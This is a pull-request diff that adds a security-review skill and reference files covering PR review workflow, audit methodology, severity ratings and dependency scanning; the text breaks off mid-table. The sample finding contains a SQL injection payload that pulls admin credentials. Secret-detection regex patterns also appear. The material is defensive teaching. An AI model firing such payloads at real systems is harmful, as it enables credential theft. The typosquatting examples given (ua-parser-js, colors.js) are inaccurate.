### PR TITLE
feat: add @tank/security-review skill

### DIFF
--- a/skills/security-review/SKILL.md
+++ b/skills/security-review/SKILL.md
@@ -1,0 +1,137 @@
+---
+name: "@tank/security-review"
+description: |
+  Comprehensive security review for any codebase, PR, or architecture.
+  Covers OWASP Top 10 (2021) and API Security Top 10 (2023), CWE Top 25,
+  code review methodology (differential and full audit), SAST tools
+  (Semgrep, CodeQL, Bandit, ESLint security), dependency and supply chain
+  scanning (npm audit, Trivy, Snyk, OSV-Scanner, SBOM), secret detection
+  (Gitleaks, TruffleHog), IaC scanning (Checkov, tfsec), threat modeling
+  (STRIDE, PASTA), language-specific vulnerability patterns (JS/TS, Python,
+  Go, Rust, Java), and remediation patterns for every vulnerability class.
+  Synthesizes OWASP Foundation standards, MITRE CWE, NIST NVD, Trail of
+  Bits audit methodology, Shostack (Threat Modeling), and OWASP Testing
+  Guide (WSTG v5).
+
+  Trigger phrases: "security review", "security audit", "OWASP",
+  "vulnerability", "CVE", "CWE", "code audit", "penetration test",
+  "threat model", "STRIDE", "PASTA", "Semgrep", "CodeQL", "SAST",
+  "DAST", "dependency scan", "npm audit", "Trivy", "Snyk", "Gitleaks",
+  "TruffleHog", "secret scanning", "supply chain", "XSS", "SQL injection",
+  "SSRF", "CSRF", "IDOR", "injection", "deserialization", "Checkov",
+  "tfsec", "IaC security", "security scanning", "secure code review",
+  "attack surface", "SBOM", "ASVS", "security checklist"
+---
+
+# Security Review
+
+## Core Philosophy
+
+1. **High confidence only** — Flag findings where you are >80% confident of real exploitability. Theoretical issues, style concerns, and low-impact findings waste reviewer trust. One confirmed RCE matters more than twenty speculative XSS.
+2. **Static tools first, human judgment second** — Run Semgrep/CodeQL/Gitleaks before manual review. Tools catch the mechanical bugs; the reviewer's time is for logic flaws, auth bypasses, and design-level issues that tools miss.
+3. **Fix patterns, not instances** — When you find one SQL injection, search for the pattern across the codebase. A vulnerability is a symptom; the missing input validation framework is the disease.
+4. **Defense in depth** — No single control is sufficient. Validate inputs AND encode outputs AND use parameterized queries AND enforce least privilege. Each layer catches what the previous one misses.
+5. **Shift left, but verify right** — Integrate scanning into CI/CD, but run a full audit before major releases. Pre-commit hooks catch secrets; production monitoring catches what pre-commit missed.
+
+## Quick-Start: Common Problems
+
+### "Review this PR for security"
+
+1. Get the diff: `git diff main...HEAD` or the PR diff
+2. Classify changed files by risk (auth, payments, user input, config > UI, docs, tests)
+3. For each high-risk file, check against → `references/code-review-workflow.md`
+4. Run targeted SAST: `semgrep scan --config p/security-audit --diff-depth 0`
+5. Check for new dependencies → `references/dependency-and-supply-chain.md`
+6. Report only >80% confidence findings with severity, location, and fix suggestion
+
+### "Run a full security audit"
+
+1. Map the attack surface: entry points, trust boundaries, data flows
+2. Run automated scans: SAST + dependency + secrets + IaC
+3. Manual review: auth flows, business logic, crypto usage, session handling
+4. Threat model critical components → `references/threat-modeling.md`
+5. Prioritize findings by exploitability × impact
+6. Write report → `references/code-review-workflow.md` (report format section)
+
+### "Check for OWASP issues"
+
+1. Identify the target type (web app, API, mobile backend)
+2. Select the relevant list: OWASP Top 10 (web) or API Security Top 10
+3. Walk through each category against the codebase
+→ See `references/owasp-vulnerability-taxonomy.md`
+
+### "Scan dependencies for vulnerabilities"
+
+1. Detect package manager (package.json, requirements.txt, go.mod, Cargo.toml)
+2. Run the appropriate scanner: `npm audit`, `pip-audit`, `trivy fs .`
+3. Triage: fixable vs unfixable, exploitable vs theoretical, direct vs transitive
+→ See `references/dependency-and-supply-chain.md`
+
+### "Set up security scanning in CI"
+
+1. Add SAST (Semgrep) → non-blocking initially, blocking after baseline
+2. Add dependency scanning (Trivy or npm audit) → block on critical/high
+3. Add secret scanning (Gitleaks) → always blocking
+4. Add IaC scanning if applicable (Checkov) → block on high
+→ See `references/sast-and-scanning-tools.md` and `references/secrets-and-iac-scanning.md`
+
+### "Find secrets in the codebase"
+
+1. Run `gitleaks detect --source . --verbose` (includes git history)
+2. Run `trufflehog filesystem . --only-verified` (verifies credentials are live)
+3. For pre-commit prevention: `pre-commit install` with gitleaks hook
+→ See `references/secrets-and-iac-scanning.md`
+
+## Decision Trees
+
+### Which Review Depth?
+
+| Signal | Depth | Time |
+|--------|-------|------|
+| Small PR, no auth/payment/input changes | Quick scan — SAST + dependency check | 10 min |
+| PR touches auth, sessions, payments, crypto | Targeted review — manual + automated | 1 hour |
+| New feature with external input | Full feature review — threat model + manual | 2-4 hours |
+| Pre-release audit, compliance requirement | Full audit — all tools + manual + report | 1-3 days |
+
+### Which SAST Tool?
+
+| Need | Tool | Why |
+|------|------|-----|
+| Fast, broad coverage, custom rules | Semgrep | Pattern-based, 30+ languages, free tier |
+| Deep data flow / taint tracking | CodeQL | Interprocedural analysis, 166 CWEs, GitHub-native |
+| Python-specific | Bandit | AST-based, Python-only, fast |
+| JavaScript/TypeScript linting | eslint-plugin-security + no-unsanitized | Integrates with existing ESLint |
+| Quick pattern matching | ast-grep | YAML rules, fast, multi-language |
+
+### Which Dependency Scanner?
+
+| Ecosystem | Tool | Command |
+|-----------|------|---------|
+| Node.js | npm audit / Trivy | `npm audit --audit-level=high` |
+| Python | pip-audit / Trivy | `pip-audit --strict` |
+| Go | govulncheck / Trivy | `govulncheck ./...` |
+| Rust | cargo-audit | `cargo audit` |
+| Multi-ecosystem | Trivy | `trivy fs --scanners vuln .` |
+| Enterprise / paid | Snyk | `snyk test` |
+
+## Exclusions
+
+These are handled by other skills or processes — do not duplicate:
+- **Auth patterns** (JWT, OAuth2, session design) → `@tank/auth-patterns`
+- **Container security** (image scanning, cosign, SBOM signing) → `@solaraai/devops-mastery`
+- **macOS system security** (SIP, Gatekeeper, FileVault) → `@tank/macos-maintenance`
+- **DOS/rate limiting** — typically operational, not code review scope
+- **Secrets already on disk** — handled by secret managers, not review
+
+## Reference Files
+
+| File | Contents |
+|------|----------|
+| `references/owasp-vulnerability-taxonomy.md` | OWASP Top 10 (2021), API Security Top 10 (2023), CWE Top 25 (2024), ASVS verification levels, vulnerability classification with code examples |
+| `references/code-review-workflow.md` | Differential (PR) review methodology, full audit workflow, attack surface mapping, >80% confidence threshold, finding classification (severity/exploitability), report format, review anti-patterns |
+| `references/sast-and-scanning-tools.md` | Semgrep (configs, custom rules, CI), CodeQL (query suites, MRVA), Bandit, ESLint security, ast-grep rules. Tool selection, result interpretation, false positive triage, CI pipeline setup |
+| `references/dependency-and-supply-chain.md` | npm audit, pip-audit, cargo-audit, govulncheck, Trivy, Snyk, OSV-Scanner. SBOM generation (CycloneDX/SPDX). Lock file analysis, typosquatting, supply chain attack patterns |
+| `references/secrets-and-iac-scanning.md` | Gitleaks, TruffleHog, detect-secrets for secret detection. Checkov, tfsec, KICS for IaC. Pre-commit hooks, CI integration, incident response for leaked secrets |
+| `references/language-vulnerability-patterns.md` | Common vulns per language: JS/TS (XSS, prototype pollution, ReDoS), Python (SSTI, pickle, command injection), Go (race conditions, integer overflow), Rust (unsafe, FFI), Java (deserialization, JNDI injection) |
+| `references/threat-modeling.md` | STRIDE framework, PASTA methodology (7 stages), attack trees, trust boundaries, data flow diagrams, when to threat model, lightweight vs formal approaches |
+| `references/remediation-patterns.md` | Fix patterns per vulnerability class: input validation, output encoding, parameterized queries, CSP/CORS headers, secure defaults, crypto best practices, safe deserialization, secure file handling |

--- a/skills/security-review/references/code-review-workflow.md
+++ b/skills/security-review/references/code-review-workflow.md
@@ -1,0 +1,323 @@
+# Security Code Review Workflow
+
+Sources: OWASP Web Security Testing Guide (WSTG v5), Trail of Bits audit methodology, McGraw (Software Security), Howard/LeBlanc (Writing Secure Code)
+
+Covers: Differential (PR/MR) review methodology, full audit workflow, attack surface mapping, confidence and severity classification, finding report format, and common review anti-patterns.
+
+---
+
+## Differential Review (PR/MR)
+
+A differential review targets the changed lines in a pull request. The goal is to identify security regressions introduced by the change — not to audit the entire codebase.
+
+### Step 1: Risk-Classify Changed Files
+
+Before reading a single line of code, classify each changed file by risk tier. Spend review time proportional to risk.
+
+| Risk Tier | File Categories | Review Depth |
+|-----------|----------------|--------------|
+| Critical | Authentication, authorization, session management, payment processing, cryptographic operations | Full manual review + SAST |
+| High | Input handling, API endpoints, database queries, file upload/download, OAuth flows | Manual review of changed logic + SAST |
+| Medium | Business logic, configuration files, third-party integrations, admin interfaces | Spot-check changed logic |
+| Low | UI components, documentation, test files, static assets, build scripts | Skim for secrets only |
+
+Apply this classification before opening any file. If a PR touches only Low-tier files, a secrets scan and a 5-minute skim is sufficient. If it touches Critical-tier files, allocate full review time.
+
+### Step 2: Check New Dependencies
+
+Every new dependency is a supply chain risk. For each new package added to a manifest file:
+
+1. Verify the package name matches the intended library (typosquatting check).
+2. Check the package's publish date and download count — newly published packages with few downloads warrant extra scrutiny.
+3. Run the dependency against a known-vulnerability database (see `sast-and-scanning-tools.md` for SCA tooling).
+4. Check whether the dependency is pinned to an exact version or a range. Ranges allow silent upgrades to malicious versions.
+5. Flag any dependency that requests unusual permissions (native addons, network access in build scripts).
+
+### Step 3: Scan the Diff for Secrets
+
+Run a secrets scanner against the diff before any manual review. Do not rely on visual inspection alone — encoded secrets, split strings, and environment variable names that shadow real values are easy to miss.
+
+Patterns that require manual verification even if the scanner passes:
+
+- Strings matching `[A-Za-z0-9+/]{40,}` (base64-encoded blobs)
+- Hex strings of length 32, 40, 64 (MD5, SHA1, SHA256 hashes used as keys)
+- Any string assigned to a variable named `key`, `secret`, `token`, `password`, `credential`, `api_key`, or `private`
+- Hardcoded IP addresses or internal hostnames in non-test code
+
+### Step 4: Manual Review of High-Risk Files
+
+For every Critical or High-tier file, apply the following checklist. Each item is a binary pass/fail.
+
+#### PR Security Checklist
+
+| # | Category | Check | Pass Criteria |
+|---|----------|-------|---------------|
+| 1 | Input Handling | All new endpoint parameters are validated before use | Validation present, not just type coercion |
+| 2 | Input Handling | Validation rejects unexpected types, not just sanitizes | Allowlist or strict schema, not denylist |
+| 3 | Input Handling | File upload handlers check MIME type server-side | Content-Type header alone is insufficient |
+| 4 | Input Handling | Path parameters are not used in filesystem operations without normalization | `path.resolve` + prefix check or equivalent |
+| 5 | Input Handling | SQL/NoSQL queries use parameterized statements or ORM | No string concatenation into queries |
+| 6 | Input Handling | XML/HTML parsers have entity expansion disabled | XXE prevention configured |
+| 7 | Auth | New endpoints have explicit authorization checks | Not relying on middleware that may be bypassed |
+| 8 | Auth | Authorization checks verify the acting user owns the resource | IDOR prevention: check `resource.owner == current_user` |
+| 9 | Auth | Privilege-escalation paths require re-authentication | Sensitive actions prompt for password/MFA |
+| 10 | Auth | New tokens or session identifiers are generated with a CSPRNG | Not `Math.random()`, `rand()`, or timestamp-based |
+| 11 | Auth | Password comparison uses constant-time equality | Not `==` or `===` on raw strings |
+| 12 | Crypto | New cryptographic operations use approved algorithms | AES-GCM, ChaCha20-Poly1305, RSA-OAEP, Ed25519 |
+| 13 | Crypto | Encryption keys are not derived from low-entropy sources | No `md5(password)` as key |
+| 14 | Crypto | IVs and nonces are generated fresh per operation | Not reused, not hardcoded |
+| 15 | Data Exposure | Error responses do not include stack traces, SQL errors, or internal paths | Generic error messages in production paths |
+| 16 | Data Exposure | Logging statements do not record PII, credentials, or session tokens | Scrub before log |
+| 17 | Data Exposure | API responses do not include fields the caller is not authorized to see | Explicit field allowlist, not object serialization |
+| 18 | Data Exposure | Redirects use an allowlist of permitted destinations | Open redirect prevention |
+| 19 | Config | New feature flags or config values have secure defaults | Default is deny, not allow |
+| 20 | Config | CORS configuration is not set to `*` for credentialed requests | Explicit origin allowlist |
+| 21 | Config | New HTTP endpoints set appropriate security headers | CSP, X-Frame-Options, HSTS where applicable |
+| 22 | Config | Dependency versions are pinned in lockfiles | No floating ranges in production manifests |
+| 23 | Output | User-controlled data rendered in HTML is escaped | Context-aware encoding, not just `htmlspecialchars` |
+| 24 | Output | User-controlled data in JSON responses is not reflected into `<script>` blocks | JSON encoding is not HTML encoding |
+| 25 | Output | Template engines have auto-escaping enabled | Not disabled for convenience |
+
+### Step 5: Run Targeted SAST
+
+Run static analysis scoped to the changed files only. Full-codebase scans during PR review produce noise from pre-existing issues. Pass the diff or the list of changed file paths to the scanner.
+
+Prioritize rules covering: injection (SQL, command, LDAP, XPath), deserialization, path traversal, hardcoded credentials, insecure randomness, and weak cryptography.
+
+Suppress findings that are not in the changed lines unless they are in a function directly called by the changed code.
+
+### Step 6: Apply the Confidence Threshold
+
+Report only findings where you are confident the issue is exploitable in the current context.
+
+| Confidence | Action |
+|------------|--------|
+| > 80% | Report as a finding. Include proof of concept. |
+| 50–80% | Add as a review comment requesting clarification. Do not block the PR. |
+| < 50% | Do not report. Note internally for full audit if the file is revisited. |
+
+A finding is high-confidence when: the vulnerable code path is reachable from an untrusted input, no compensating control exists elsewhere in the call chain, and you can describe the exploit steps without assuming additional preconditions.
+
+---
+
+## Full Audit Workflow
+
+A full audit examines the entire codebase, not just recent changes. Use this workflow for pre-release security assessments, third-party audits, and post-incident reviews.
+
+### Phase 1: Scope and Reconnaissance
+
+Define what is in scope before writing a single note.
+
+- Identify the application's primary function and the data it handles (PII, financial, health, credentials).
+- Document the tech stack: language, framework, database, cache, message queue, cloud provider.
+- Obtain architecture diagrams, API documentation, and threat model if they exist.
+- Identify the trust boundaries: what is public-facing, what is internal, what is admin-only.
+- Agree on out-of-scope items in writing (third-party SaaS, infrastructure not owned by the team).
+
+Deliverable: a one-page scope document listing in-scope components, data classifications, and known threat actors.
+
+### Phase 2: Attack Surface Mapping
+
+Enumerate every point where untrusted data enters the system. Do not begin reviewing code until this map is complete.
+
+See the Attack Surface Analysis section below for the full entry point taxonomy.
+
+Deliverable: a table of entry points, their trust level, and the data they accept.
+
+### Phase 3: Automated Scanning
+
+Run all four scanner categories against the full codebase. Triage results before manual review to avoid duplicating effort.
+
+| Scanner Type | What It Finds | When to Run |
+|-------------|---------------|-------------|
+| SAST | Code-level vulnerabilities: injection, path traversal, insecure APIs | Before manual review |
+| SCA | Known CVEs in dependencies | Before manual review |
+| Secrets | Hardcoded credentials, API keys, private keys | Before manual review |
+| IaC | Misconfigured cloud resources, overly permissive IAM, open security groups | Before manual review |
+
+Triage automated findings into: confirmed (will report), needs-manual-verification, and false-positive. Do not carry unverified automated findings into the report.
+
+### Phase 4: Manual Review
+
+Manual review covers what automated tools cannot: business logic flaws, authorization model correctness, and cryptographic protocol design.
+
+Prioritize in this order:
+
+1. **Authentication flows** — registration, login, password reset, MFA enrollment, session termination. Trace each flow end-to-end.
+2. **Authorization model** — identify every permission check in the codebase. Verify that every sensitive operation has one. Look for checks that can be bypassed by manipulating object IDs, role parameters, or request headers.
+3. **Business logic** — identify operations that have financial, legal, or safety consequences. Ask: can these be triggered out of order? Can they be triggered by an unauthorized user? Can they be triggered more times than intended?
+4. **Cryptographic operations** — review every use of encryption, hashing, signing, and random number generation. Verify algorithm choice, key management, and IV/nonce handling.
+5. **Session handling** — verify session tokens are invalidated on logout, privilege change, and password reset. Check for session fixation vectors.
+6. **Data flows for sensitive data** — trace PII and credentials from entry to storage to deletion. Verify encryption at rest and in transit.
+
+### Phase 5: Finding Validation
+
+Before writing a finding, validate it.
+
+1. Confirm the vulnerable code path is reachable from an untrusted input.
+2. Identify any compensating controls in the call chain (WAF rules, middleware, framework defaults).
+3. Reproduce the issue in a test environment or construct a proof of concept that demonstrates exploitability.
+4. Rate severity using the criteria in the Confidence and Severity section below.
+5. Discard findings that cannot be reproduced or where compensating controls fully mitigate the risk.
+
+Do not report theoretical vulnerabilities without evidence of reachability.
+
+### Phase 6: Reporting
+
+Structure each finding using the format in the Report Format section below. Organize the report as:
+
+1. Executive summary (1 page): overall risk posture, critical finding count, key themes.
+2. Findings (one page per finding): full detail per the standard format.
+3. Appendix: scope, methodology, tool versions, out-of-scope items.
+
+Deliver a draft to the development team for factual corrections before finalizing. Do not accept requests to downgrade severity without a documented technical justification.
+
+---
+
+## Attack Surface Analysis
+
+Map every entry point before reviewing code. An entry point is any location where data from an untrusted source enters the application.
+
+| Entry Point Type | Trust Level | Key Checks |
+|-----------------|-------------|------------|
+| HTTP REST endpoints | Untrusted | Input validation, auth check, rate limiting, output encoding |
+| GraphQL resolvers | Untrusted | Query depth/complexity limits, field-level auth, introspection disabled in prod |
+| WebSocket handlers | Untrusted | Auth on connection upgrade, message validation, per-message auth if stateless |
+| Message queue consumers | Semi-trusted | Schema validation, idempotency, poison message handling |
+| Cron jobs / scheduled tasks | Internal | Verify no user-controlled input reaches the job; check for TOCTOU |
+| CLI commands | Varies | Argument injection, shell metacharacter handling, privilege level |
+| File upload handlers | Untrusted | MIME validation server-side, filename sanitization, storage outside webroot, virus scan |
+| OAuth callbacks | Untrusted | State parameter validation, code-for-token exchange server-side, redirect URI allowlist |
+| Webhook receivers | Semi-trusted | Signature verification before processing, replay protection |
+| Admin interfaces | Privileged | Separate auth domain, IP allowlist, audit logging |
+| Import/export features | Untrusted | CSV injection, XML/ZIP bomb, path traversal in archive extraction |
+| Third-party SDK callbacks | Semi-trusted | Validate data from SDK before use; do not trust SDK-provided identity claims |
+
+For each entry point, trace the data flow to: database queries, filesystem operations, subprocess calls, template rendering, and external API calls. These are the sinks where injection vulnerabilities manifest.
+
+---
+
+## Confidence and Severity
+
+### Confidence Thresholds
+
+| Confidence Level | Criteria | Action |
+|-----------------|----------|--------|
+| High (> 80%) | Reachable from untrusted input, no compensating control, exploit steps are clear | Report as finding |
+| Medium (50–80%) | Reachable but compensating control may exist, or exploit requires specific conditions | Note for follow-up; request clarification |
+| Low (< 50%) | Theoretical, not confirmed reachable, or fully mitigated | Do not report |
+
+### Severity Ratings
+
+| Severity | Examples | Business Impact |
+|----------|----------|----------------|
+| Critical | Remote code execution, authentication bypass, mass data breach, privilege escalation to admin without credentials | Immediate exploitation likely; system compromise or data loss |
+| High | Privilege escalation requiring valid account, stored XSS in admin panel, SQL injection with limited data access, SSRF to internal network | Significant damage possible; exploitation requires some effort |
+| Medium | Reflected XSS, CSRF on sensitive actions, insecure direct object reference, sensitive data in logs, missing rate limiting on auth endpoints | Moderate damage; exploitation requires user interaction or specific conditions |
+| Low | Verbose error messages, missing security headers, weak password policy, information disclosure in non-sensitive endpoints | Limited direct impact; increases attack surface or aids reconnaissance |
+| Informational | Best practice deviations, deprecated API usage, missing audit logging | No direct exploitability; improves security posture if addressed |
+
+### Exploitability Factors
+
+Adjust severity up or down based on these factors:
+
+| Factor | Severity Adjustment |
+|--------|-------------------|
+| Network-accessible without authentication | +1 tier |
+| Authentication required | -1 tier |
+| User interaction required (e.g., victim must click a link) | -1 tier |
+| Exploit is publicly known or tooled | +1 tier |
+| Data affected is regulated (PII, PCI, PHI) | +1 tier |
+| Compensating control partially mitigates | -1 tier |
+
+Do not adjust below Informational or above Critical.
+
+---
+
+## Report Format
+
+Use this structure for every finding. Consistency enables developers to triage and remediate efficiently.
+
+### Finding Template
+
+```
+Title:       [Concise description of the vulnerability, e.g., "SQL Injection in User Search Endpoint"]
+Severity:    [Critical | High | Medium | Low | Informational]
+Confidence:  [High | Medium | Low]
+CWE:         CWE-[ID]: [Name]
+Location:    [file path]:[line number(s)]
+
+Description:
+[2–4 sentences explaining what the vulnerability is, where it exists, and why it is dangerous.
+Do not describe how to fix it here.]
+
+Proof of Concept:
+[Step-by-step instructions to reproduce the issue, or a code snippet demonstrating exploitability.
+Include the exact request, payload, or code path. If a test environment is required, note it.]
+
+Remediation:
+[Specific, actionable fix instructions. Reference the relevant pattern in remediation-patterns.md.
+Include a corrected code snippet where the fix is non-obvious.]
+
+References:
+- OWASP WSTG: [section ID and URL]
+- CWE: https://cwe.mitre.org/data/definitions/[ID].html
+- [Additional references as needed]
+```
+
+### Sample Finding
+
+```
+Title:       SQL Injection in User Search Endpoint
+Severity:    High
+Confidence:  High
+CWE:         CWE-89: Improper Neutralization of Special Elements used in an SQL Command
+Location:    src/api/users/search.js:47
+
+Description:
+The user search endpoint constructs a SQL query by concatenating the `q` query parameter
+directly into the query string without parameterization. An attacker can inject arbitrary
+SQL to extract data from any table accessible to the database user, modify records, or
+in some configurations execute operating system commands.
+
+Proof of Concept:
+  GET /api/users/search?q=' UNION SELECT username,password,null FROM admin_users--
+
+  Expected response includes admin credentials from the admin_users table.
+  Tested against staging environment on 2026-03-15.
+
+Remediation:
+Replace string concatenation with a parameterized query:
+
+  // Vulnerable
+  const query = `SELECT * FROM users WHERE name LIKE '%${req.query.q}%'`;
+
+  // Fixed
+  const query = 'SELECT * FROM users WHERE name LIKE ?';
+  db.execute(query, [`%${req.query.q}%`]);
+
+See remediation-patterns.md § SQL Injection for ORM-specific patterns.
+
+References:
+- OWASP WSTG: WSTG-INPV-05 — https://owasp.org/www-project-web-security-testing-guide/
+- CWE: https://cwe.mitre.org/data/definitions/89.html
+```
+
+---
+
+## Review Anti-Patterns
+
+Avoid these failure modes. Each one produces reviews that miss real vulnerabilities or waste reviewer time.
+
+| Anti-Pattern | Description | Consequence | Correction |
+|-------------|-------------|-------------|------------|
+| Rubber-stamping | Approving a PR without reading the diff, relying on CI passing | Security regressions ship undetected | Apply the risk classification step; never approve without reading Critical/High-tier files |
+| Tool-only review | Running a scanner and reporting its output without manual verification | High false-positive rate; developers lose trust in security reviews | Validate every automated finding before reporting; manual review is mandatory for auth and business logic |
+| Scope creep | Auditing the entire codebase during a PR review | Review takes too long; blocks development; reviewer fatigue | Scope PR reviews to changed files and their direct callers only |
+| False positive fatigue | Reporting low-confidence findings to appear thorough | Developers ignore security comments; real findings are buried | Apply the 80% confidence threshold strictly; fewer, higher-quality findings |
+| Diff-only blindness | Reviewing only the changed lines without understanding the surrounding context | Missing vulnerabilities where the change removes a compensating control | Read the full function and its callers for any Critical/High-tier change |
+| Missing business logic | Focusing exclusively on injection and XSS; ignoring authorization and workflow flaws | Business logic bugs (IDOR, privilege escalation, race conditions) ship undetected | Explicitly review authorization checks and state machine transitions in every audit |
+| Severity inflation | Rating every finding as Critical to ensure it gets fixed | Developers deprioritize security work; credibility erodes | Apply severity criteria strictly; reserve Critical for RCE, auth bypass, and mass data breach |
+| No proof of concept | Reporting a finding without demonstrating exploitability | Developers dispute findings; remediation is deprioritized | Reproduce every High and Critical finding before reporting |
+| Ignoring compensating controls | Reporting a vulnerability that is fully mitigated by a WAF rule or framework default | Wasted developer time; erodes trust | Trace the full call chain including middleware before reporting |
+| Skipping the threat model | Reviewing code without understanding who the adversary is | Effort spent on low-risk paths; high-risk paths missed | Complete Phase 1 (scope and reconnaissance) before any code review |

--- a/skills/security-review/references/dependency-and-supply-chain.md
+++ b/skills/security-review/references/dependency-and-supply-chain.md
@@ -1,0 +1,378 @@
+# Dependency and Supply Chain Security
+
+Sources: OWASP Dependency-Check documentation, Trivy documentation, npm audit documentation, SLSA specification, Sonatype State of the Software Supply Chain (2024)
+
+Covers: Software Composition Analysis (SCA) by ecosystem, SBOM generation, supply chain attack patterns and detection, lock file hygiene, and a structured triage workflow for dependency vulnerabilities.
+
+---
+
+## Dependency Scanning by Ecosystem
+
+Run SCA scans on every pull request and in CI. Treat HIGH and CRITICAL findings as blocking by default; establish a documented exception process for accepted risks.
+
+| Ecosystem | Primary Tool | Command | Alternative |
+|-----------|-------------|---------|-------------|
+| Node.js | npm audit | `npm audit --audit-level=high` | Snyk, Trivy |
+| Python | pip-audit | `pip-audit --strict` | Safety, Trivy |
+| Go | govulncheck | `govulncheck ./...` | Trivy |
+| Rust | cargo-audit | `cargo audit` | Trivy |
+| Java/Kotlin | OWASP Dependency-Check | `dependency-check --scan .` | Trivy, Snyk |
+| .NET | dotnet list package | `dotnet list package --vulnerable` | Snyk |
+| Multi-ecosystem | Trivy | `trivy fs --scanners vuln .` | Grype, Snyk |
+
+### Trivy (Universal Scanner)
+
+Trivy is the recommended default for multi-ecosystem and container scanning. It covers OS packages, language dependencies, IaC misconfigurations, and secrets in a single binary.
+
+**Installation:**
+
+```bash
+# macOS
+brew install trivy
+
+# Linux (script)
+curl -sfL https://raw.githubusercontent.com/aquasecurity/trivy/main/contrib/install.sh | sh -s -- -b /usr/local/bin
+
+# Docker (no install required)
+docker run --rm -v "$(pwd)":/workspace aquasec/trivy fs /workspace
+```
+
+**Core scanning modes:**
+
+```bash
+# Filesystem scan — all supported ecosystems under current directory
+trivy fs .
+
+# Container image scan
+trivy image myapp:latest
+
+# Remote git repository
+trivy repo https://github.com/org/repo
+
+# IaC configuration scan (Terraform, Kubernetes, Dockerfile)
+trivy config .
+```
+
+**Severity filtering — only report HIGH and CRITICAL:**
+
+```bash
+trivy fs --severity HIGH,CRITICAL .
+trivy image --severity HIGH,CRITICAL myapp:latest
+```
+
+**Ignoring accepted risks with `.trivyignore`:**
+
+Create `.trivyignore` at the repository root. Each line is a CVE ID or Trivy finding ID to suppress. Document the reason in a comment.
+
+```
+# CVE-2023-12345: affects only the CLI entrypoint, not reachable in production
+CVE-2023-12345
+
+# Accepted risk: no fix available, mitigated by WAF rule WR-42
+CVE-2024-67890
+```
+
+**CI integration (GitHub Actions):**
+
+```yaml
+- name: Run Trivy vulnerability scan
+  uses: aquasecurity/trivy-action@0.28.0
+  with:
+    scan-type: fs
+    scan-ref: .
+    severity: HIGH,CRITICAL
+    exit-code: 1
+    ignore-unfixed: true
+    format: sarif
+    output: trivy-results.sarif
+
+- name: Upload Trivy results to GitHub Security tab
+  uses: github/codeql-action/upload-sarif@v3
+  with:
+    sarif_file: trivy-results.sarif
+```
+
+### npm audit Specifics
+
+**Understand the three invocation modes:**
+
+```bash
+# Report only — exits non-zero if vulnerabilities at or above threshold
+npm audit --audit-level=high
+
+# Apply safe, non-breaking upgrades automatically
+npm audit fix
+
+# Apply breaking upgrades (semver major bumps) — review diff carefully
+npm audit fix --force
+```
+
+`npm audit fix --force` can introduce breaking API changes. Always review the resulting diff and run the full test suite before merging.
+
+**Advisory severity levels:** `critical`, `high`, `moderate`, `low`. Set CI gates at `high` minimum. Treat `critical` as P0.
+
+**Patching transitive dependencies with `overrides`:**
+
+When a transitive dependency has a vulnerability and the direct dependency has not yet released a fix, use the `overrides` field in `package.json` to force a patched version:
+
+```json
+{
+  "overrides": {
+    "vulnerable-transitive-package": ">=2.3.1"
+  }
+}
+```
+
+Verify the override does not break the dependent package's behavior. Remove the override once the direct dependency ships a fix.
+
+**Verifying package provenance:**
+
+```bash
+# Verify registry signatures for all installed packages
+npm audit signatures
+```
+
+This checks that packages were signed by the npm registry and have not been tampered with post-publish. Run this in CI alongside `npm audit`.
+
+### pip-audit
+
+```bash
+# Install
+pip install pip-audit
+
+# Scan current environment
+pip-audit
+
+# Strict mode — exit non-zero on any vulnerability
+pip-audit --strict
+
+# Scan a requirements file without installing
+pip-audit -r requirements.txt
+
+# Output JSON for downstream processing
+pip-audit --format json --output audit.json
+```
+
+### govulncheck (Go)
+
+`govulncheck` uses the Go vulnerability database and performs call-graph analysis to report only vulnerabilities in code paths that are actually reachable.
+
+```bash
+go install golang.org/x/vuln/cmd/govulncheck@latest
+govulncheck ./...
+```
+
+Unreachable vulnerabilities are reported at a lower severity. Prioritize findings where `govulncheck` confirms the vulnerable symbol is called.
+
+### OWASP Dependency-Check (Java/Kotlin)
+
+```bash
+# CLI scan
+dependency-check --scan . --format HTML --out reports/
+
+# Maven plugin
+mvn org.owasp:dependency-check-maven:check
+
+# Gradle plugin (build.gradle)
+# apply plugin: 'org.owasp.dependencycheck'
+# dependencyCheck { failBuildOnCVSS = 7 }
+```
+
+The NVD data feed requires an API key for reliable updates. Set `NVD_API_KEY` in CI and pass `--nvdApiKey $NVD_API_KEY`.
+
+---
+
+## SBOM Generation
+
+An SBOM (Software Bill of Materials) is a complete, machine-readable inventory of all components in a software artifact, including direct and transitive dependencies, their versions, and their licenses.
+
+**Why generate SBOMs:** Rapid CVE impact assessment (query the SBOM when a new CVE is published); license compliance (identify GPL/AGPL before production); regulatory compliance (US EO 14028, EU CRA); incident response evidence.
+
+**SBOM formats:**
+
+| Format | Standard Body | Best For |
+|--------|---------------|----------|
+| CycloneDX | OWASP | Security analysis, CVE correlation, VEX |
+| SPDX | Linux Foundation | License compliance, legal review |
+
+Prefer CycloneDX for security workflows; use SPDX when legal or procurement teams require it.
+
+**Generation commands:**
+
+```bash
+# CycloneDX for Node.js
+npx @cyclonedx/cyclonedx-npm --output-file sbom.json
+
+# CycloneDX for Python
+pip install cyclonedx-bom
+cyclonedx-py environment --output-format json > sbom.json
+
+# Trivy SBOM output (multi-ecosystem)
+trivy fs --format cyclonedx --output sbom.json .
+
+# Syft (universal, supports 50+ ecosystems)
+# Install: brew install syft
+syft . -o cyclonedx-json > sbom.json
+syft . -o spdx-json > sbom-spdx.json
+
+# Attach SBOM to container image as OCI attestation
+syft myapp:latest -o cyclonedx-json | \
+  cosign attest --predicate - --type cyclonedx myapp:latest
+```
+
+**Querying an SBOM for a specific CVE:**
+
+```bash
+# Using grype against a CycloneDX SBOM
+grype sbom:./sbom.json
+
+# Using OSV-Scanner against a CycloneDX SBOM
+osv-scanner --sbom sbom.json
+```
+
+Store SBOMs as CI artifacts, regenerate on every release, and version-control them alongside the release tag.
+
+---
+
+## Supply Chain Attack Patterns
+
+Supply chain attacks target the build pipeline, package registry, or dependency graph rather than the application directly. A single compromised package can affect thousands of downstream consumers.
+
+| Attack Type | Mechanism | Real-World Example |
+|-------------|-----------|-------------------|
+| Typosquatting | Publish a package with a name similar to a popular package | `ua-parser-js` (2021), `colors.js` protest injection |
+| Dependency confusion | Register a public package matching a private internal package name | Alex Birsan research (2021), affected Microsoft, Apple, PayPal |
+| Compromised maintainer | Attacker gains control of a legitimate maintainer account | `event-stream` (2018) — malicious code injected via new maintainer |
